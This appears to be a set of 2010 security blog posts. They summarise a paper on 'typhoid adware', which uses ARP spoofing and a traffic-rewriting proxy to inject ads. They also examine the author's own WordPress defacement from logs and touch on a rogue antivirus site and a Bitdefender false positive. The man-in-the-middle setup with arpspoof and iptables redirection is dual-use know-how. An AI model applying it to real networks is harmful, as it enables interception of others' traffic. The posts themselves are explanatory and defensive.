You have to go to malwarecity.com
Paper by Daniel Medeiros Nunes de Castro, Eric Lin, John Aycock, and Mea Wang
Presented @ Eicar 2010
Abstract: Typical strategy for adware authors is to install their software on as many machines as possible and, for each affected machine, display advertisements to the user(s) of that computer. In this paper we present a different model: typhoid adware. Typhoid adware is more covert, displaying advertisements on computers that do not have the adware installed.
We prove that this is a viable adware model with three proof-of-concept implementations and discuss possible defenses, for which we have two
proof-of-concept implementations.
How it works:
Let’s say you are in a coffee shop enjoying a tall cappuccino and using the wireless service provided to you for free by the café . Normaly, the traffic to and from the Internet passes through the access point. Let’s further suppose that I’m infected with a new piece of adware (probably got it from p2p file sharing websites or sites that provide cracks and serial numbers). This new and brilliant piece of adware will convince the other people’s laptops standing in the coffee shop to communicate through my computer rather than directly with the access point. Once it manages to do so, each time they access a webpage, my adware will instert advertisments in their page before delivering them to their computers. On the other hand, the adware will not do anything on my PC, so I’ll never know I’m infected so basically I’m just the carrier. Hence… the name of typhoid adware.
Obviously this type of attack falls in the category of “man-in-the-middle” type of attacks, but the article further describes more specific details. (btw, The article is very well written. I really enjoyed reading it, especially with the cool history lessons regarding typhoid fever).
The first step is to convince the other computers that you are the access point. The process is described in the paper, but you can find a short description of the process also on wikipedia http://en.wikipedia.org/wiki/ARP_spoofing
Setup: ARP spoofing to intercept and hijack connections – arpspoof program from the package dsniff. Simple HTTP proxy implementations (using a Python app – TinyProxy) where you can add the content modification feature. All the HTTP traffic is redirected (traffic using port 80/TCP) to a local port, used by the modified proxy server. Redirection was done by defining rules for Network Access Translation (NAT) in the malicious node, using Netfilter and the iptables package on Linux kernels.
Further on, the paper describes three proof-of-concept implementations:
1. intercept and modify HTML code before serving it to the victim (endless possibilities of what you can do here)
2. Video modification (requires you to download the entire video first)
3. Streaming Video modification (niceeee)
The article ends with a list of possible solutions like heuristic analysis of ARP packets, static IP-to-MAC mapping tables, the adoption of IPv6, ARP spoofing detection included in Firewall software and even the introduction of a new setting in the network configuration called Internet café.
And that’s about it. Good lecture!
Everyone in favor?
Been browsing all day and this one integrates well with previous posts. I think I’ll keep it 
Anybody else receiving this massive spam wave regarding new messages on Twitter?
(obviously, do not open that URL)
I’m not a blogger, although it sounds fancy to be one. I just hold this blog up to gather spam comments. (for some reason, spam bots do enjoy this blog and I get a lot of fresh new samples every day).
Anyway, this Monday I received a lot of emails from friends saying ha ha!, you got your blog defaced (btw, thanks for the emails everybody. I rarely visit my blog, so I would have probably noticed next week). What could I say… me? You sure? I’m a targeted victim now? Wow… I’m famous 
.
Well, they were right, this is what I saw when I entered my blog…..
So, after replacing the index.php with an empty index, I started to check the apache logs to see what happened.
Turns out that, if you bing for “ip:208.109.78.139 powered by wordpress” like the bad guys did (http://www.bing.com/search?q=ip%3a208.109.78.139+powered+by+wordpress&go=&scope=web&qs=n&sk=&sc=1-39&first=31&FORM=PERE2) you will get all the wordpress blogs hosted at that IP, which turns out to be a godaddy server according to the whois information.
So, now that they know that this blog is a wordpress blog hosted on a godaddy server, let’s see what the apache logs indicate:
“GET blog.catalincosoi.com/wp-content/themes/2/style.css HTTP/1.1″
“GET blog.catalincosoi.com/ HTTP/1.1″
“GET blog.catalincosoi.com/wp-content/themes/2/print.css HTTP/1.1″
“GET blog.catalincosoi.com/wp-content/themes/2/img/header.jpg HTTP/1.1″
“GET blog.catalincosoi.com/favicon.ico HTTP/1.1″
“GET blog.catalincosoi.com/wp-login.php HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/css/login.css?ver=20091010 HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/css/colors-fresh.css?ver=20091217 HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/button-grad.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/logo-login.gif HTTP/1.1″
“GET blog.catalincosoi.com/favicon.ico HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/button-grad-active.png HTTP/1.1″
“POST blog.catalincosoi.com/wp-login.php HTTP/1.1″
“GET blog.catalincosoi.com/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/load-styles.php?c=1&dir=ltr&load=dashboard,plugin-install,global,wp-admin&ver=17aa35fdf22036c3f75256fc16b16184 HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/ HTTP/1.1″
“GET blog.catalincosoi.com/wp-includes/images/blank.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/media-button-image.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/wpspin_light.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/media-button-video.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/media-button-music.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/media-button-other.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/load-scripts.php?c=1&load=jquery,utils,quicktags&ver=b64ae9a301a545332f1fcd4c6c5351b4 HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/wp-logo.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/fav.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/visit-site-button-grad.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/fav-arrow.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/menu.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/load-scripts.php?c=1&load=hoverIntent,common,jquery-color,wp-ajax-response,wp-lists,jquery-ui-core,jquery-ui-resizable,admin-comments,jquery-ui-sortable,postbox,dashboard,plugin-install,thickbox,media-upload&ver=e7dd2696b99d6664702753286996fc2d HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/menu-bits.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/menu-dark.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/menu-arrows.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/screen-options-left.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/screen-options-right.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/gray-grad.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/white-grad.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/icons32.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-includes/js/thickbox/loadingAnimation.gif HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/index-extra.php?jax=dashboard_incoming_links HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/index-extra.php?jax=dashboard_primary HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/index-extra.php?jax=dashboard_secondary HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/index-extra.php?jax=dashboard_plugins HTTP/1.1″
“GET blog.catalincosoi.com/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/themes.php HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/load-styles.php?c=1&dir=ltr&load=global,wp-admin&ver=4198bec071152ccaf39ba26fd81dcd63 HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/load-scripts.php?c=1&load=jquery,utils&ver=d24248fe4b0cd62086633fd42ef1019b HTTP/1.1″
“GET blog.catalincosoi.com/wp-content/themes/3/screenshot.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-content/themes/connections/screenshot.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-content/themes/bluehorizon/screenshot.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-content/themes/2/screenshot.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-content/themes/classic/screenshot.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/load-scripts.php?c=1&load=hoverIntent,common,jquery-color,thickbox,theme-preview&ver=7cccc49e3f8148675288b56f5fb521e5 HTTP/1.1″
“GET blog.catalincosoi.com/wp-content/themes/1/screenshot.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-content/themes/default/screenshot.png HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/theme-editor.php HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/load-styles.php?c=1&dir=ltr&load=theme-editor,global,wp-admin&ver=82cd6abb819d7fe96521a25504995eeb HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/load-scripts.php?c=1&load=hoverIntent,common,jquery-color&ver=975a66473369e28f12fa81a4deb3836d HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/theme-editor.php?file=/themes/2/index.php&theme=blackview&dir=theme HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/images/button-grad-active.png HTTP/1.1″
“POST blog.catalincosoi.com/wp-admin/theme-editor.php HTTP/1.1″
“GET blog.catalincosoi.com/wp-admin/theme-editor.php?file=/home/content/c/a/t/catalinus/html/blog/wp-content/themes/2/index.php&theme=blackview&a=te&scrollto=12331 HTTP/1.1″
“GET blog.catalincosoi.com/wp-login.php?action=logout&_wpnonce=f7ab117f9b HTTP/1.1″
“GET blog.catalincosoi.com/wp-login.php?loggedout=true HTTP/1.1″
If I’m reading this corectly, it happended like this:
- search for wordpress blogs hosted at that godaddy address
- log in
- modify the theme’s index.php
- log out
Which means 3 things:
- I am not the only victim (bing for the same IP + the hackers name and you can find other defaced blogs)
- They knew my (and the others) password -> will look further into this one!!!!
- I’m not that famous
Obviously, since they had admin access, they could have done whatever they wanted besides just defacing.
Now, I got to see where they have the passwords from. I googled for godaddy server hacked and found plenty of links to start from, but they all state that godaddy isn’t very helpful…. I’ll send them an email also.
So… disappointed that I wasn’t the targeted [famous] victim, I’ll start searching for a new WP theme (it was about time to change it, I sort of got bored of all that black) and will also see what exactly happened with these passwords.
Will be back!
PS: also created a new category
Project Page: labs.bitdefender.com
This is an experimental solution for filtering blog comments for spam. The analysis is made on a remote server where messages are run through a series of filters. Depending on the total score, the comment is categorized as spam or legit.
We are very happy that we finally have something that can be tested and we need your help. All we require is that if you are a blogger, to try our solution for a couple of days (or even an unlimited number of days) and see how that works out for you.
For any questions and/or suggestions, email to asblog@labs.bitdefender.com or if you learned about this project from this blog, you can also add comments directly here
Installation:
- from WordPress Dashboard/Plugins select Add New
- select Upload and browse to the plugin
- install and activate
- enter a valid e-mail in the BitDefender Client ID field
If unsuccessful, try uploading the plugin by ftp in the plugin directory and activating manually.
I’m working on a slidecast about this which will probably be available this wednesday.
or in french:
If you are a Windows 64-bit user and also a customer of BitDefender and you are experiencing some issues with your computer since yesterday (20 March 2010) it might be a incredible good idea to visit this URL: http://www.bitdefender.com/site/KnowledgeBase/consumer/#638
Due to a recent update for Windows 64-bit systems it is possible that BitDefender detects several Windows and BitDefender files as infected with Trojan.FakeAlert.5 .
Following this event, in some instanced BitDefender and/or Windows did not work properly anymore (PC failed to boot or certain applications did not work anymore )
In order to solve the issue please follow the instuctions below:
– If you are using Windows Vista click here
– If you are using Windows 7 click here
– If you are using Windows XP click here
Domain ID:D158376320-LROR
Domain Name:UPDATEFM.ORG
Created On:16-Feb-2010 12:41:27 UTC
Last Updated On:16-Feb-2010 12:41:29 UTC
Expiration Date:16-Feb-2011 12:41:27 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)
would it be … a rogue AV?
Some random code from the HTML source:
for(i=0;i<4;i++) { $("#warn_"+i).my_hide(); }
//$(".ch_bg").animate({width:"415px"},scen_time*1000);
percentTic = setInterval(doUpdatePercents,scen_time*10);
warnTic = setInterval(doShowWarns,scen_time*250);
blinkTic = setInterval(doBlink,1000);
Cool stuff!
